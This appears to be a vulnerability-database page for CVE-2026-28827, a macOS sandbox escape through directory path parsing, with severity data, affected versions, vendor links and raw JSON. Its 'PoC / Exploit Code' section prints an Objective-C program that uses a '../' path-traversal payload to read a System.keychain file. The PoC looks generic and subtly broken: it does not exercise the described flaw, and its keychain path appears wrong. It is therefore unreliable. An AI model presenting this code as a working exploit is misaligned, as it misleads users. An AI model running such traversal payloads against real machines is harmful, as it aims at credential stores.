Security Vulnerability Report
CVE-2026-28827 CVSS 9.3 CRITICAL

Published: 2026-03-25 01:17:08
Last Modified: 2026-03-26 16:48:31

Description

A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.7.5, macOS Sonoma 14.8.5, macOS Tahoe 26.4. An app may be able to break out of its sandbox.

CVSS Details

CVSS Score: 9.3
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE (macOS Sequoia < 15.7.5)
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE (macOS Sonoma < 14.8.5)
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE (macOS Tahoe < 26.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
objective-c
/*
 * PoC for CVE-2026-28827: macOS Sandbox Escape via Directory Path Parsing
 * Description: This code attempts to access a restricted file outside the sandbox
 * by exploiting the path validation logic.
 */
#import <Foundation/Foundation.h>

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        // Constructing a path that may bypass validation due to parsing issues
        NSString *bypassPayload = @"./../../../../../../../../private/var/root/System.keychain";
        NSFileManager *fileManager = [NSFileManager defaultManager];
        NSLog(@"Attempting to read restricted file using payload: %@", bypassPayload);
        if ([fileManager fileExistsAtPath:bypassPayload]) {
            NSLog(@"[+] Sandbox Escape Successful! File exists.");
            NSData *data = [NSData dataWithContentsOfFile:bypassPayload];
            NSLog(@"[+] Data read: %lu bytes", (unsigned long)data.length);
        } else {
            NSLog(@"[-] Exploit failed or path does not exist.");
        }
    }
    return 0;
}

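References

https://support.apple.com/en-us/126794 (Release Notes, Vendor Advisory)
https://support.apple.com/en-us/126795 (Release Notes, Vendor Advisory)
https://support.apple.com/en-us/126796 (Release Notes, Vendor Advisory)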

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28827", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:07.890", "lastModified": "2026-03-26T16:48:30.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.7.5, macOS Sonoma 14.8.5, macOS Tahoe 26.4. An app may be able to break out of its sandbox."}, {"lang": "es", "value": "Se abordó un problema de análisis en el manejo de rutas de directorio con una validación de rutas mejorada. Este problema se corrigió en macOS Sequoia 15.7.5, macOS Sonoma 14.8.5, macOS Tahoe 26.4. Una aplicación podría escapar de su sandbox."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.5", "matchCriteriaId": "D66288AF-23BD-407A-81F5-F1DFBF84C622"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.5", "matchCriteriaId": "DD21D2C9-BBEC-4E8E-B8D2-C92B7E6155E1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", 
"versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126795", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126796", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}